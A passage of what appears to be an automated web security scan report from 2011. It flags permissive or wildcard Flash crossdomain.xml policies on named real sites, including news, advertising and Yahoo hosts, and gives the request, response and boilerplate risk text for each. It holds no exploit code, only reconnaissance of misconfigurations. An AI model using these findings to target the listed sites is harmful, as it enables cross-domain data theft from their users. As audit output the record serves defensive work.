<allow-access-from domain="image.take40.com"/>
...[SNIP]...
<allow-access-from domain="singstar.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
<allow-access-from domain="staging.knockedupthemovie.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="www.mygeneration.com.au"/>
...[SNIP]...
<allow-access-from domain="staging.mygeneration.com.au"/>
...[SNIP]...
<allow-access-from domain="ad.mcminteractive.com"/>
...[SNIP]...
<allow-access-from domain="114.111.133.74"/>
...[SNIP]...
<allow-access-from domain="http://*.notwosouls.com.au/"/>
...[SNIP]...
<allow-access-from domain="notwosouls.com.au/"/>
...[SNIP]...
<allow-access-from domain="*.notwosouls.com.au/"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="*.jonoanddano.com.au"/>
...[SNIP]...
<allow-access-from domain="jonoanddano.com.au"/>
...[SNIP]...
<allow-access-from domain="*.beinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="boost.com.au"/>
...[SNIP]...
<allow-access-from domain="*.justdancegame.com.au"/>
...[SNIP]...
<allow-access-from domain="*.exigaholiday.com"/>
...[SNIP]...
<allow-access-from domain="http://local.thehothits.com"/>
...[SNIP]...
<allow-access-from domain="*.movideo.com"/>
...[SNIP]...

8.64. http://www.trilulilu.ro/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trilulilu.ro
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trilulilu.ro

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:05 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 11:02:32 GMT
ETag: "7f932a-4e-49df68c86c200"
Accept-Ranges: bytes
Content-Length: 78
Connection: close
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

8.65. http://www.tutorialized.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tutorialized.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tutorialized.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:50 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 18:09:34 GMT
ETag: "394fa93-63-48abbf4989380"
Accept-Ranges: bytes
Content-Length: 99
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.66. http://www.virtual-hairstyles.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtual-hairstyles.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.virtual-hairstyles.com

Response

HTTP/1.1 200 OK
Content-Length: 204
Content-Type: text/xml
Last-Modified: Mon, 22 Nov 2010 06:27:43 GMT
Accept-Ranges: bytes
ETag: "36d5df5ee8acb1:c95b2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

8.67. http://www.weddings.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weddings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weddings.com

Response

HTTP/1.1 200 OK
Age: 45
Date: Mon, 02 May 2011 00:28:37 GMT
Cache-Control: max-age=86400
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "9d4045cd8fffcb1:44e8"
Content-Length: 207
Content-Type: text/xml
Last-Modified: Wed, 20 Apr 2011 19:18:59 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
box: 03
X-Powered-By: ASP.NET

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

8.68. http://www.wmms.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wmms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wmms.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3082424437
X-Cache-Server: varnish04
Expires: Sun, 01 May 2011 23:29:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:29:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

8.69. http://www.wsfa.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wsfa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wsfa.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Mon, 02 May 2011 00:52:50 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:52:50 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

8.70. http://www.wtoc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wtoc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtoc.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS39
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9bf"
Cteonnt-Length: 208
Expires: Sun, 01 May 2011 23:42:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:42:07 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

8.71. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:00:44 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 418
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...

8.72. http://ads-vrx.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads-vrx.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:20:04 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

8.73. http://ads.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Mon, 02 May 2011 01:57:00 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

8.74. http://ads2.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads2.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

8.75. http://adx.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 02 May 2011 02:00:56 GMT
Expires: Tue, 03 May 2011 02:00:56 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

8.76. http://cookex.amp.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

8.77. http://csct.att.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://csct.att.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: csct.att.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:18 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 07 Jan 2009 00:40:16 GMT
ETag: "344769-20f-c47e5c00"
Accept-Ranges: bytes
Content-Length: 527
P3P: policyref="http://csct.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAaPSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.sbc.com" />
<allow-access-from domain="*.rodgerstownsend.com" />
<allow-access-from domain="*.attonlinevault.com" />
<allow-access-from domain="*.attyourworld.com" />
<allow-access-from domain="*.youratt.com" />
<allow-access-from domain="youratt.com" />
...[SNIP]...

8.78. http://d.chango.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.chango.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.chango.com

Response

HTTP/1.0 200 OK
Content-Length: 190
Etag: "6652b063ccbb23f87f48301640c5b4ceaed7aadc"
Content-Type: text/xml
Server: Chango RTB Server

<?xml version="1.0"?>
<!-- http://as.chango.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.chango.com" />
</cross-domain-policy>

8.79. http://geo.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

8.80. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 01 May 2011 03:42:34 GMT
Expires: Mon, 02 May 2011 03:42:34 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 70952
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

8.81. http://media.washingtonpost.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT
Content-Type: application/xml
Content-Length: 478
X-Cnection: close
Cache-Control: must-revalidate, max-age=456
Date: Sun, 01 May 2011 23:33:16 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com"/>
...[SNIP]...

8.82. http://news.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.yahoo.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:33:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Vary: Accept-Encoding
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

8.83. http://online.wsj.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:02 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:18:09 GMT
Accept-Ranges: bytes
Content-Length: 3499
